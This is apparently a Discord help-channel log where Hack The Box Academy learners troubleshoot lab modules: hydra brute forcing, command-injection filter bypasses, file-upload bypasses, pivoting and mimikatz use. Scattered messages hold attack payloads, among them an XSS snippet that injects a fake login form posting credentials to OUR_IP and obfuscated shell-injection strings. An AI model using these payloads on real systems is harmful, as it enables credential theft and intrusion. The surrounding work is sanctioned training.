#modules

hydra on the https endpoint works for me btw, but you don't need to access it to do the question

Hello Everyone,

just used linpeas, showing it is container, and on /proc mounted looks likes exploitable, does someone know what is this? didnt see this on academy

ATTACKING COMMON APPLICATIONS
Application Discovery & Enumeration
When i run aquatone, this is the output page, any ideas on what i did wrong?

there are filters you need to bypass

I tested with your command line and I still getting errors, this is very weird.

What's the intented way? Brute force login on SMTP? It seems very fragile and will fail if I run more than 1 connection at a time.

there are other services running

Yeah, I've been successful with using ${IFS} instead of spaces, ${PATH:0:1} instead of forward slashes, separting letters with single quotes, using %0a instead of an ampersand. But I still can't read the flag. If I try to use a space or a backslash, I get an explicit error message, but I've been able to get rid of all the explicit error messages. I just don't get any output when I try to read the flag.

solved, use chromium or chrome not firefox...

are you able to run id?

yes

then just continue with that and cat the file, don't think there's much more than that

ok so I troubleshooted it some more and it seems it was the number of simultaneous connections that were the issue just in case you are interested. Running with -t 1 fixed it

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts without more context is hard to say, but pretty sure it's not academy related, might want to ask at #boxes

thanks sir

I just reset the target and the same command I had been using before with no success worked right away.

in common services attack skill assessments, are the user.list and pws.list still valid? I just ran hydra against ftp, smtp, rdp and https basic auth with the name ||fiona ||and got no matching password.

if the lists attached to a module don't work and there's nothing on the box hinting at a password or list you can make, then use rockyou.txt

good old rockyou, with 1 connection at a time I'll see you guys tommorow! thanks for the tip

you're getting the same error even for ftp and smtp, etc.?

That's fixed, the issue was too many connections at once

Hydra is working just fine now, but I didn't get any hits with the module's password list

I'm not so sure, I use -t 32, -t 48, -t 64 all the time

It depends

Everything seems to point to a brute force attack though

ssh demands -t 4, but there's nothing in that module that requires -t 1

I forget what I did for this one

I do too usually, but on this box it seems to not work.

Tbh I just looked around

ftp works

smtp works too

you don't even need the provided list for that

Isn't this the ||anon|| one?

I think we're still talking about the one with fiona, apologies if I'm wrong

yeah I found fiona, it's the easy box

that's what I thought

oh I just ran rockyou and got a hit

there you go

The errors plus attached password list threw me on a wild goose chase

thanks for the help lol, it was something very simple in the end.

strange

Hello ninjas,
any one worked with xfreerdp ?

probably anyone here who didn't start yesterday, what's your question?

nope never heard of it before today

definitely don't know about the goated /drive: option

or /dynamic-resolution

what’s that

i did the smart thing yesterday and zipped up the Windows tools and transferred them to my vm

big brain thinking, I've also done the same

when i initially started the zip my rdp connection dropped

but it was still going after i reconnected so

👍

It is a remote desktop protocol lib

I get a Certificate verification failure 'self-signed certificate (18)' error

try the option /cert:ignore

there's an option to ignore certificates, check the manual

Wnted already said what it is

oh I thought It should use certs, ok I'll check that

nah

htb machines you're safe to do /cert:ignore

and even then you CAN just have it connect and accept the cert each time

¯_(ツ)_/¯

So I got the flag in Common Service Attack easy skill assessment by checking the file structure in the files on the FTP, dropping a webshell from mysql, accessing through the browser and got a revshell. But ... I feel like that was a bit much for an "easy" box. Did I miss something trivial?

sometimes the difficulty rating is misleading

HTB difficulty in general is different than other platforms

Thanks @fathom pendant
hmmm, actually I have trust issues in anything on the internet 😄 LOL

That's healthy 😄

There's no mention of webshells so far in the module so I am sure it was a bit overkill

yes; but these are academy modules that you're connecting to with express permission

technically there is

don't we all?

Oh I am not crazy then 😄

but at the same time: iirc that one has a couple different ways to get it

If you are a security analyst and not paranoid, you aren't in the right field I am afraid.

I did find the easy skills assessment there to be the most convoluted

Most of the time on HTB, if you're ever connecting to a service that involves certificates, you'll need to ignore certificate validation as they are self-signed, not signed against a common CA, so yeah.. on HTB it's fine. Public internet, stay vigilant

I wouldn't trust difficulty ratings too much, I've found some medium modules easier than some easy ones, it happens

Appreciate that advice 🙏 I will

For something easy I expected something like smtp enum, brute force the password and RDP.

I would say that's because you're coming fresh off learning it: so it's pushing you in the direction

and you're having to remember something you may have learned a few hours or days ago

it wasn't hard per se, just a lot of steps, but that's all fine

If I hadn't done OSCP before this I don't think I would have got that one. I don't think the module mentions webshells.

the module mentions a method of getting a shell

There's a whole Shells & Payloads module before that one

via mysql iirc

it's just making me wonder if I didn't skip over something super easy

it's a whole thing

are you doing them out of order?

^

because anything from previous modules is fair game

don't do the pentest path out of order

you will hurt yourself

I am since I did the OSCP before. I checking what's missing from my knowledge base to get the OSCP certification.

don't

because the htb modules are gonna be more in-depth than what OSCP is gonna teach

But I'll most likely revisit all of them later

a LOT of the information is built off each other

or do, but you'll run into a bunch of situations like that where the module didn't teach you something, but it was already taught in a previous one

^

while yes the modules are generally self contained

they are assuming other knowledge

this isn't OffSec's "figure it out yourself, loser" approach

yes but my time is limited before my exam and I know where I am lacking. Plus it's to succeed in the OSCP, not the CPTS. I will come back to them at one point.

you'll do better at OSCP if you learn the stronger fundamentals

fwiw

Lol you tell me. so far HtB is much more interesting. I wouldn't recommend OSCP to anyone over HTB

Yup, pen-200 is a shit course, but we been knew

If you prepare for CPTS you will crush OSCP

is the point being made

Is Offsec structure still "here's a doc to read", and then pass you to the labs to practice?

Been a while sice I did it

that's a point-of-fact made clear by people who hold both certs

and maybe some AI voice generated vids from what i heard

No, they've copied other platforms and have the modules and exercises online now

the labs are hit/miss or just completely back-asswards

Not anymore. but its still bad.

Interesting, thanks

Yeah, thing is, I failed my first attempt with some bullshit box, even my veteran coworkers couldn't figure out it post engagement and anyone I know who got it, failed. I am checking the stuff I know I am lacking from the OSCP first, but I am coming back for all of it, don't worry!

It's an improvement, but it's still crap compared to what else there is on the market, and extra crap compared to CPTS

Theres 3 standalone boxes though, couldn’t find out the other 2 either?

I don't believe in shitting on competitors, think we're all doing good in the field. Doesn't stop me from hearing others perspectives 😉

I had spent so much time on the big AD by that point I was out of steam.

and like we said: while it's good to brush up on things you don't know -- this path is definitely best done in-order

I only shit on OffSec because it's deserved, there are good vendors outside HTB too, and I recommend those based on context

not pick and choose :P because methods taught earlier (that might be better than offsec's methods) might be MORE beneficial than just strengthening your weak points

Im waiting for reaction from offsec dev team and then I’ll be starting my oscp journey as well

yeah, I am just trying to up my weak points in order to get more general knowledge in my limited time. Otherwise I would. Will check all of them don't worry, so far it's much more interesting.

Some of their newest sets are shit that isn't covered in their course at all

There’s an issue with the link I got sent to accept the course

And they're adding more

Personally I’m going through the ad, sqli and privesc modules

I think those will matter the most

I completed all exercises sucessfully and got nadda in the end, so yeah. It's a lot of figure it out yourself.

Yeah, I agree

I've done PNPT, most of CPTS and their stupid course in a couple of weeks, still failed the first attempt

Cpts and their stupid course😄

got deleted before I could

Good

probably deleted for a good reason

Sorry, I meant pen-200 as the stupid course 😁

as in a "careful what you say about a closed exam"

I know of that.

if you see X on the exam RUN ;)

I know 😄

With all the extra stuff I did post exam i still don't know what I would do more if I ever got the same box.

Same 🤷

you got it before too?

The ad set was unbeatable?

That would give some big issues

40 points down the drain

Yup, I've researched it for weeks and weeks, nothing

essentially. Even veteran pen testers didn't figure out how to approach it.

Yeah, I know plenty of pentesters haven't been able to do shit on that indeed

All we can do is pray we get a different one next time

yeah, makes you wonder if it's so you buy more attempts 🤔

Getting scared now 😄

It's the newest set and most people are now getting that one

plus I despise how they spy on you through your webcam for 24h, not doing that again once I get that cert. Very unpleasant.

So even cpts module won’t be enough?

Yup, it's not enough

Zephyr wasn't enough either

I got crte material as well

As long as you don't get that one AD you should be fine... I think?

I really don't mind the proctoring, but I'm not getting anything else from OffSec

Or I need to root all the standalones

I rooted two, got user on the 3rd

if you have done 80% of the exercises

Yeah I’m going to get bonus points for sure

Those 10 can make or break sometimes

Definitely get those, yeah

If I get the same box I just focus 100% on the standalones and I think I'll be fine.

If you got the bonus points you can ignore the AD, but I was so focused on getting it that I was too tired by the end to root 3 boxes

You’ll get it next time

hey don't jinx it!

Pay harder

😆

the HtB courses sure are making me more confident though. Just not against that AD

It haunts me in my nightmares, I hope one day we find out what that was about

I am not into satanic rituals sadly. Have you seen the horned jenkins on the oops pages? I see it in my nightmares too!

https://technologyconversations.files.wordpress.com/2016/02/jenkins-devil.png

if you didn't buy any cubes or have an active subscription the pwnbox is extremely limited in it's internet access

yes: nothing is stopping you from downloading and setting up your own vm though

hey guys whats up

not a gen chat: read #welcome and #rules ; #welcome will explain as well how to gain access to more of the server (including the Gen chat)

Hey wsg y'all.

Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

Password Attacks - Linux PTT

I know the answer, I found it without the actual need to SSH as I could just cd into svc's dir.

The problem is the following:
I found john's keytab, hash and password, any idea where I can search for svc's credentials?

Checked the crontab -l, found a script, ran it, nothing happened.

maybe check where the script points to

there's ways to extract info from a keytab and ccache :P

Hey everyone

A quick stupid question :D, if I cannot ping academy running machines, is there any quick troubleshooting steps I should count?

• I am connected through HTB openvpn via udp: 1337 => Initialization Sequence Completed
• pinging google works
• pinging machine =>

$ping 10.129.33.67 -c 1
PING 10.129.33.67 (10.129.33.67) 56(84) bytes of data.

--- 10.129.33.67 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms

True, haven't checked ccache.

end the connection, rm the file, download a new one

change to tcp; and changing server region also helps

noted Thanks ♥

@fathom pendant can u please remind me what should I do ? I kinda forgot

the thing

#welcome #rules ? I did read them

idk man i'm not you so idk what you need or want

Nothing too special

there's instructions at the bottom of #welcome

on how to access more of the server

I just wanna know the next step

jesus christ

I'll try

don't try, do

chill marc

@fathom pendant can we chat on private real quick?

you need an account on http://app.hackthebox.com/ to be able to verify

no

I did made an account yesterday and did read the #welcome #rules

Now I have to get to another sever ?

then follow the instructions at the bottom of #welcome it's not that difficult

i never said to go to another server

the instructions are there under the verification section

pretty quick and easy steps

#bot-commands these ?

that's another channel

not another server

Damn, read and do

You got this

Yeah, I saw the .kt thingy, I even checked it before...I doubt however that this is Kotlin related, which .kt is about.

that extension is also used for keytabs

I swear I tried to send a pic
Anyway thanks

You don't need to send a pic, you type the command with your account identifier

can't send a pic here unless you verified/linked your account

Oh well...that explains it. Going back to work, thx for the fast response :)

i believe the section explains how to extract info from those files

Yeah, I transferred a .py keytabextract.

i thought that was already on the system

might not be though ¯_(ツ)_/¯

sometimes it's 50/50 on the provided hosts

We shall see.

@fathom pendant I tried to put my information but nothing worked

My email and my password

Did you even create an account, fam?

I literally wrote them on a paper just in case I forgot

Yes yesterday

academy and app are different platforms

Oh, well it probably didn't acticate as it might've expected verification on email?

And that^

if you signed up for academy the login is separate from app

So what should I do ?

hence why i said WAY earlier that it requires https://app.hackthebox.com account

create an account there

and use the identifier of that account

academy doesn't have an identifier for the account (yet)

U know what

Just tell how to delete my acc

why? because you can't be bothered to follow any basic instructions?

lol

Exactly 🙂

at least you're self-aware

Hm.

Laters

on https://academy.hackthebox.com/settings if you scroll to the bottom of that page, there's a delete account button

¯_(ツ)_/¯

ok aligators

Should be a delete option right in the settings, but I don't see why creating two accounts in 5 minutes tops is a problem

not gonna force you to participate in something if you need to have your hand held at every step

Let's move discussion back to modules, don't need to think about them anymore.

https://tenor.com/view/forget-it-flash-men-in-black-will-smith-gif-19235596

The modules, yes, they're great, love them

Am I a mazochist.

Fo renjoying password attacks.

Very..modualistic

you getting this figured out?

Yup, got the password already.

sweet! also there's another enumeration tool they use: i highly suggest it - very helpful for the last question

So modular indeed, and those sections

But I don't thing svc-s home should be accessible. ( without the svc's password,

don't think too hard about it

Once I approach it , I will be sure to regard my matter to you.

svc is a service account it needs to be accessible by other users, in-general

https://tenor.com/view/write-that-down-taking-notes-school-universities-university-gif-17937210

I wonder if I could've bruteforced the entries.

service accounts are definitely unique

maybe but would you have actually learned anything? ¯_(ツ)_/¯

True.

aside from "swing hammer until it works"

Mhm.

Kerberos is actually amazing.

As a concept. I love it.

I receive the following error when attempting to start a target in Password Attacks > Pass the Ticket (PtT) from Linux: "You don't have enough permissions to create a genesis."

EDIT: Fixed by launching another target in another module and then relaunching the original.

gagbit it

Hi @fathom pendant, can you help with the selection of the right module to develop new skills for a CISSP cert

Why ask a specific person without even knowing if they have that cert?

Someone in #careers-and-certs might be able to advise on that

wow, finished the Hashcat module, didnt know that Hashcat has so much more to offer than dictionary attacks

https://tenor.com/view/who-are-you-people-spongebob-patrick-gif-7335905

fun fact: hashcat has an output mode 👀

what do you mean with that?

File Upload
The above exercise uses a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to load a PHP script and run code to read the "/flag.txt" file. I am stuck on this question. I find a few working payloads from burpsuit but after pasting them in the url I keep getting 404 found error.

just that hashcat has an output mode xD so you can output to a file instead of forgetting and needing to run with --show

HELP ME

ah got it, just like in nmap

yep lmao, know how much headache that saves?

ya especially when using tmux and cant scroll up so the output is capped xD

i played around with it a bit last night

-o file.cracked --output-format=2 gives you just the plaintext password (not the username associated with it)

good when cracking big lists

File Upload HELP ME !
The above exercise uses a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to load a PHP script and run code to read the "/flag.txt" file. I am stuck on this question. I find a few working payloads from burpsuit but after pasting them in the url I keep getting 404 found error.

https://tenor.com/view/kto-kounotoritoken-kounotori-lbow-storkholders-gif-25676340

you don't have to repeat yourself

go through the section again and use the same payloads

The time has come...

Even if it's 3:16 AM.

we honestly do not care

Wsg Anders.

the gen chat is elsewhere

hello anders_hack-tech

read #welcome to find out where

Please read #rules and #welcome to gain access to #general.

hey @slender shoal peep @ their profile

Just did.

..

seems like they're just here to advertise their services

BrUh

No services

!!!

@upper ruin i've learned to spot these kinds of things

sirg the #rules read them

I already think You have some RandomServiceOfferRadar.py

Running on MarcieLee@root

i'm just experienced in spotting this shit from a mile away; even without the profile it smelled fishy

Meh, I get paranoid about secret QAs.

That's about it.

Anyways:

username was a dead giveaway to def look at the profile

you have big antennas MarcieLee 😄

Got that name of the tool, before I die on my desk asleep

https://tenor.com/view/antenna-radar-ltu-lietuva-eik-nahui-gif-26465177

look towards the bottom of that section if you haven't already lol

Oh, I knew you would say that.

Lilikatz it was..

I think?

linikatz*

Or smth related

Yeah.

btw which module can you guys suggest, which one did you enjoyed most? cant decide which to do next

like mimikatz: but linux

Password Attacks.

:))))

i'm doing the pentester job role path tbh

it helps reinforce fundamentals too

How far r u into it?

only halfway - got distracted by some bullshit life stuff

:P gotta finish up ad enum soonish

I really wanna checkout the senior web pentester

Oo AD, nice

but christmas and stuff

Yeah...relatable.

that's best to check out after cbbh

Ah.

I expect a new certificate.

yes: CWEE

Weeee

the acronym has been known since they dropped Gold Annual

Mm.

on Pentester Job Role im only 34% rn

Has a anyone had the urge of rereading everything twice or thrice.

Even after a module is completed.

Same, just on the end on password attacks.

do them in order

if you're doing the pentester path, it should be in order

im doing no path tbh

there are concepts in the path that you're expected to know from other modules (or if you already know them)

you're just stating in general that if you were doing it, you'd be 34%?

picking modules at random?

yes its a hobby rn
trying to get an apprenticeship, after that i want to become a pentester

bug bounty hunter is 66%

tbh if you want to become a pentester, do the path itself in order

don't just do random

just finish the modules there in order

might be wise to do so

:P you might learn a bit more than you think you know

i enjoyed the most in the NoSQL module btw

@lusty thicket@fathom pendant Thanks for no help other than empty talk.

I mean Wnted definitely gave a valid tip 🤷

you're not owed any specific help :P and I've seen Wnted be more right than most in that reading the section you might find that one of the examples works

you're needing to bypass an image filter to run php code is what they give you so you need to do something like x.php.png or something along those lines

¯_(ツ)_/¯

but the section should be more specific about it

@fathom pendantIf you read what I asked you would understand that I passed the filter but I can't access the website. You're not reading properly. But you advise me to read it again?

Be nice.

Else....

Bonk

heated

well if you're getting a 404 then you're doing something wrong

¯_(ツ)_/¯

I'm shutting up. I'm very angry tonight. I'm sorry if I offended you. I've been in the same place for 7 hours.

or you're accessing the resource incorrectly

then step away, take a break and come back with fresh eyes and brain tomorrow

I have been on one section for an entire week.

Just imagine how good it will be when you figure it out 🙂

Not once did I get mad.

Maybe, that's because my aggression pours out at muay thai sparring.

Damn, that's a loophole -> be stuck on a module for a week -> beat people up in sparring + try harder.

the thing about this chat is it's community driven, when you come in ENTITLED to have your question answered then you're likely gonna be disappointed when the answer was staring you in the face of your impatience ¯_(ツ)_/¯

Well, I always search the question if it has been regarded before.

And every single one is

that also helps :P you're likely not the first person to come here with that issue

Yup.

and sometimes it's just you flipped a and b order around

we should rename this chat to support, now we are slaves, we need to help 😄

like forgetting to start a listener before accessing your shell

Oh that's a pain in the ahh.

or in the live engagement for shells and payload: forgetting to use the internal IP address

Or mistaking the IP for the reverse shell.

Oh yeah LOL

point is: everyone dum

type flag.txt on Linux after you've been at it all day

Hhahahaha

unless you're @mossy solstice then you're just cracked

❤️ sorry for ping bakki

I will surpass

Promise

nah dude, kid's an actual prodigy

I hope I don't go to jail, beforehand

Bakki? Nah, no one's surpassing him

Aight bet

not even 18 and doing maldev R&D for work; and making his own C2

What the f

Yeah, people ain't joking when they say prodigy

Y'all weren't joking about the kid part

its ok LOL

yes im kid

@mossy solstice how old is u

17

I think he caps

💗

I don't trust u man

You told everyone

lmfao why would i lie

U r secretly nsa

i wish

Makes me feel too old for this

Makes me feel inferior as fuck

And dumb

bakki just has an insane drive for knowledge

Lemme be an annoying HR

Cpts where???

he does not care for certs

I solved the room before I died. I'm going to bed. I apologize for my bad words, good night.

What a chad

You don't need no certs, when you've got pure genius

i mean why would he if he's already got a job in the field

Good point

What

17...job?

In the field????

imma be real ur never really too old for this unless you have dementia or alzheimers or smth like that

ye bakki is in a country where he can have a jerb at 17

^

or severe brain damage

i mean making ur own c2 not necessarily impressive its moreso the stuff i wanna add to it that i guess makes it based

Damn

🪞

Not just any job, but in the field.

Respect.

i wouldn't compare yourself to bakki tbh ¯_(ツ)_/¯

comparison thief of joy remember

Bible says it

!!!

he's an example that if you have clear skill: then certs are just fancy toilet paper

like school degrees

Yeah, it's not gonna stop me, but it might have been better if I'd figured this out a decade ago

@hallow kiln i root for you ull make big moves

imma be real

even me wishes i started younger its a bias you'll never get away from no matter how young

when did you guys started?

i did 2 yrs ago

3 months

if i had not actually stopped learning 10 years ago i'd probably be at a decent level now ¯_(ツ)_/¯

I am slow af

skillset that got me my job was a year ago but i actually started htb maybe 2 years ago

Beginning of this year, I'd tried a couple of years ago, but life got in the way, so had to begin from scratch

maybe more, used to do web and stuff

I got stuck in the trap of wanting someone to mentor me

and not wanting to learn the info for myself

i did game dev before, wish i've started earlier with htb

I've always liked learning things for myself, never thought about mentoring, it includes talking to people and shit

i wanted to do game dev too but it got boring

also hearing stories about how it goes in companies its uhhhh yeah, passion is cool mental health is cooler

Yeah, I've got friends in the gaming industry, it's a mess

crunch time go brrr

yeah part time tho

(because AAA is too much of a bitch to actually admit they overpromised)

take it full time after you grad/turn 18?

yeah after i grad

ill see, i got other plans and opportunities

I imagine you'll never run out of opportunities with your skills

i seen people that in comparison i look like a noob too almost be homeless, u never know sometimes luck does not go brrr

but yeah its just specializing that does wonders

All the best to you, you've got the skills and the drive to get places

yeah just saying like sometimes u just get unlucky doesnt mean you shouldnt try

there is always bigger fish

there is no objective best either ways

never

i was already asked if i wanted osep but truth is i cbf with taking the exam

i did cybernetics which is apparently osep like and it was fun but ehhhhhhh

i would maybe consider cpts if the course wasnt mandatory

just cuz i have a lot of friends doing it and im wondering how painful it would be

Hi everyone! Has anyone done the ADCS module? Im stuck on the last question of the skills assessment. Getting an odd certipy error so I'm not quite sure what is going wrong even with the -debug flag. Any help would be greatly appreciated 🙂

They really should get rid of the mandatory course completion thing

yeah only to relate to the pain of some people

i didnt really hack in so long i know i would probably get slapped

by flag 9

I will find out what that's about soon™️

Hi does anyone know you to get the answer for the first question( What is the URL of the WordPress instance? ) in Attacking Common Applications - Skills Assessment II ive tried Fuzzing and keep getting the 302 errors and cant find it, im using this command and other a like ffuf -w /usr/share/SecLists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -u http://gitlab.inlanefreight.local:8180/FUZZ

got it working! hehe it helps to play around with teh flags 🙂

Awesome module! I love academy 🙂

would love to see some cloud stuff 😄

or windows binary exploitation other than vanilla buffer overflows 🙂

Socks5 Tunneling with Chisel Module:

Anyone find a workaround for this?

Posted in erratum already, but I'm wondering what kind of workaround there is. I searched the post history and it seems as though a lot of users have had the same issue.

just use a different pivot/tunnel method

might not be the official method

but it's what I did

What method for this one?

I'm trying to work through the module as I read it.

I can go back to another one if that's necessary.

on password attacks skills assessment - Hard how do i transfer B******.v** to my machine

i tried smb and nfs but they fail always

Will Sshuttle work?

most other methods work

if doing xfreerdp you can mount a drive by doing /drive:name,/path/ *you can also do relative paths like ./ tells it to mount the current dir you're in

O.O thanks i will give it a try

What does the word "give" mean in your sentence?

You're gonna need to disable CGO and recompile the binary on your host, Or compile the binary on your target, thats obviously an incompatible C lib dependency issue. CGO by default is enabled and allows you to invoke C code from Go code, try to use export CGO_ENABLED=0 when compiling the binary again. Read more on that. sometimes solving a problem brings clarity on a whole other subject.

I dont recall personally having that issue, maybe because I compiled it months before I used it on that box and my C lib was in sync with the version on the target.

compile it statically

https://stackoverflow.com/questions/61319677/flags-needed-to-create-static-binaries-in-golang

Hey can anyone help me with pivoting assessment?

https://tenor.com/view/if-you-think-of-an-gif-20132469

in password attacks - hard, how to mount the B*****.v** file

You can search this channel. Plenty of articles

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

This is one of the easiest to follow

it doesnt work in wsl

is there any other method

Well idk about wsl, try transferring to host and mount on host then

¯_(ツ)_/¯

my windows doesnt have bitlocker either :(

What errors do you get in wsl?

Your windows doesn't have to have bitlocker my guy

then how can i mount

Google: mount vhd windows

oooo it works

On windows? I believe it’s as simple as right clicking and mount

i was trying to open it from wsl partition

now i moved the windows

But also this is another L for wsl

I've had it work pretty well in a regular linux vm

bruh it is not asking me the password

ooo nvm

figured it out

HAHAHAHAJ are u for real?

i had to click from the drive instead i was clicking the vdh file

I got the answer to these 2 questions through brute forcing it (well, more that I made a dictionary attack) lol... for the first one, I essentially tried all powersploit commands... for the second i got all exe and went trying... I have the right answer but need help understanding. (the first one for instance I have no clue how to arrive at the answer properly, the second one I sort of do but I don't understand why that's the answer). If anyone has any insight's I would appreciate it.

• 2 Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.

• 1 Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.exe

How do I find the index number of a file??

am confusion

I tried ls -la

but none of the numbers seem to work

is there a way to get an iso of the version of the HTB version of parrot OS used on the site that brings all the wordlists and stuff?

OK I feel really stupid or I miss something...
in AD Enumeration & Attacks - Skills Assessment Part II - question 1:
I tried all the methods to find users, but only kerbrute worked.. found 57 users
tried all the passwords in the modules about password spraying but nothing worked.
How am I suppose to guess the password?

I honestly don't even remember any reference to index numbers for files in the module, so I'm not exactly sure where it's wanting me to look

nvm

forgot about -i

using the tool shown in the module responder

Hello! I ran into a problem in the CROSS-SITE SCRIPTING (XSS) module - phishing. When trying to delete an image url input element using the

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--

As a result, a fake authorization form appears on the site, but the image url input field does not disappear and a piece of code sticks out

');');document.getElementById('urlform').remove();

Nothing is working. Can someone tell me what I'm doing wrong? Thanks!

Try with this:
||```
;document.getElementById('urlform').remove()</script><!--

Probably you aren't closing the rest of the HTML code

Hey hackers , I'm in nibbles priv escalation..I uploaded a reverse shell ..got my bash shell..now I wanna be root so i ram LinEnum to find that monitor can be run without root password. Now. , when i execute sudo bash monitor.sh . It' asks for sudo password. But why ?

dont use the enumerator scripts, getting the solution is a lot simpler

@surreal nymph there's a command that will tell you what programs you can run as sudo, use that to check for what you can run via gtfobins

@rustic sage Thank you for your response. I'll check it out ! 👍

monitor.sh is the right way to go though. your command is trying to run bash as sudo, try running the script directly

ah wait it's not gtfobins it's payloadallthethings sorry

tunneling with rdp help

nvm got it i had to run as admin

OK got it.. thanks. Had to use verbose mode in Responder

eee this exercise is tunneling my brain

yep i did it again i forgot to run rdp as admin

awesome!

sudo ./.sh

hi who can talk with me about learning english for hacking

show the sudo -l result

You got me!

okey i am 14 years old and my english is not good. I want to learn cyber security and i dont wanna pay money for learn english what should i do

.

English is a very easy to learn language, so don't worry, learning it would be a breeze for you.
You have to just include english in your daily routine conversations (verbal is effective).
You can watch english movies or content with subtitles on.
You can read write ups or novel stories to capture the flow.
You can write something about your day every night in 200-300 words.
As simple as that.
I just wrote this all randomly, so don't mind the writing errors.

ahhhh

i did but i cant see the effect

It is a constant or consistent journey, things take a bit time to establish. Just Keep going..

You can translate the Academy modules into your native language with deepl. This way you learn both english and hacking

However, i am not a native english speaker, i still learning to communicate with corporates

but this way can works for me just beginning

Are you from Russia?

nope

Then..?

What was the error that you fixed?

Hi all! Can anyone help with the skill assessment for HTTP ATTACKS. I bypassed WAF, it turned out to be not difficult, I have several ways to smuggle a request, but I do not receive a response letter, which I redirect to myself. I tried all possible options, but unfortunately nothing gives me any information that I could cling to, since the response letter does not arrive.

Sometimes, we transform a simple issue into an escalated problem. It happens to me, a lot!

<@&861185840277487616>

you need to @ the role lol

anyone can use it

Module: Attacking Enterprise Network

Section: Exploitation and Privilege Escalation

I'm stuck just on trying to browse to the target website ||(172.16.8.20)||. I have ||used SSH port forwarding for port 8081 and modified /etc/proxychains.conf, and I have also updated my proxy settings in firefox||. Back in my ||root@dmz01|| shell (which I spawned through ||dynamic port forwarding||), I see a bunch of messages saying "Temporary failure in name resolution." I'm not sure how to fix that.

From a general standpoint sounds like incorrect DNS settings, but you're trying to get to something by IP so maybe it's an unrelated error message.

I'm pretty sure it's related, because the error messages pop up in the shell soon after I try to browse to the IP

Are you trying to SSH to the IP or open it up in a web browser, I'm on the SOC path so not familiar with the module you reference.

I have a feeling it's something pretty simple like a typo or something or firefox trying to do a google search for the IP and it can't resolve google.com

if you're browsing to an IP it shouldn't use DNS at all

Sorry for the confusion - I've ||SSHed as root into a box on the perimeter of the target network, and I'm trying to use it as a pivot host to attack boxes on the internal network||. One of the internal IP addresses is ||172.16.8.20, which has port 80 open||. Given that I've set up ||a pivot as root on dmz01 (on the network perimeter)||, I should be able to browse to the site.

Yeah good point lol

I'm going to try ||setting up the pivot using a tool other than proxychains (Metasploit, Ligolo)|| and see if that is more stable.

Can you ping the IP from the box in the DMZ? Best to check lower levels of the OSI model first before trying something like port 80, and internal host would probably not accept connections from hosts in the DMZ.

bear in mind that most people want to do Attacking Enterprise Blind

so you're already revealing quite a bit about the network: Can you please use spoiler tags || before and after

||like this||

that at least lets people who are interested in helping you to help without fully spoiling anything for people who still want it blind

(like myself)

Yes, great point. Thank you. I'll delete my previous messages.

you don't need to delete, you can just ||edit them in||

lol it's not twitter; edit features exist

What's Twatter only familiar with X and TikTok because I was born this year with an iPad in my swaddle.

I'm going to take a break for now and come back to this tomorrow. Thanks to those who offered help!

the only appropriate app to deadname is twitter

and idk if you're being serious

Edited to remove ambiguity.

So working on the command injection module, and one of the side exercises is to see about getting a command escaped. Here is it in the module:

$(a="WhOaMi";printf %s "${a,,}")

Here is my version with items spaced out so its more apparent what I escaped and didn't

$ ( a = " whoami " ; printf % s " ${a,,} " )
$%28a%3d%22wh'oa'mi%22%3bp'ri'ntf%09%25s%09%22${a,,}%22%29

any help would be appreciated. This is a linux box testing against

hi everyone, I am unable to pass the current section because "Target: Click here to spawn the target system!" doesn't show the target ip, hence I am not sure how can I find the right ip on which I should complete the section and answer the question, any suggestion?

you have to spawn it

what do u mean

Click it

:^)

I do click it but it doens't show anything

Does it do "Target is spawning"

yes

but then doesn't show anything

what module and section is it?

are you able to spawn targets in other sections?

module/35/section/247 web requests GET

I am not sure , but I was able to do that before

module numbers mean nothing

the actual name helps more

try refreshing the page

HTTP fundamentals

or clearing cache and relogging in to try again

I did refresh it a lot,

good idea, I will clear the cache

also disable any ad blockers

for me its spawning

I don't see a module named "HTTP Fundamentals"

fwiw Module name means the name that's in the tab/title of the page; section refers to the small part that you're working on

I.E. "Web Requests; HTTP Fundamentals"

Module Name is Web Requests

I did clear the cache, relogged, but still, when I click on it, it says Target is spawning, then it shows again the "Target: click here to spawn the target system"

As Rafa said its working for them

and not showing the ip or the websit ethat I should be practicing on

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

I was able to launch all the servers there

Did you try changing vpn region?

That might not fix it

But eh worth a shot

(Reason it might not is because these web servers are public ips)

okay

so I disabled all the VPNs, but still it didn't work

however, going into the developer tools, looking at the request, I found the response with the ip and port number, now it does work. However, the HTB website itself doesn't show this response, for some reason, no idea why

¯_(ツ)_/¯

That's a support related question

seems like so

these kind of bugs are quite annoying 😉 but thanks guys for your support

its in your side

since for everyone else works

pivoting and tunneling skills assessment - i got hashes for the user, but i cant crack them

tried rockyou with deadone

If you can raise it with support, please include OS, Browser and version, and any plugins enabled. Thank you

Just finished the Web Attacks skill assessment and my days, definitely one of the most thrilling, even tho I spent like 4hrs on it 💀

probably not meant to be cracked, if it's ntlm you can pth

will do bro, I hope they will fix it

If you have that info now I can include it internally

but that is not in this module

Don't recall any hashes for that assessment, I think you could find passwords there 🤔

If you want to drop that info in DM I can include it in the message I raised internally about this - see the same issue a couple of times recently (including you) from people

find passwords or extract from lsass

okay, let me DM you with the info

Thanks!

because the hint says this

I use "find" very broadly there

That's a pretty good hint

lsass doesn't have to only contain hashes

Mimikatz is your friend, look at the most common commands you can run

iirc i remember facepalming SUPER hard

like it was that simple

oh i got it now, before i used mimikatz wrong

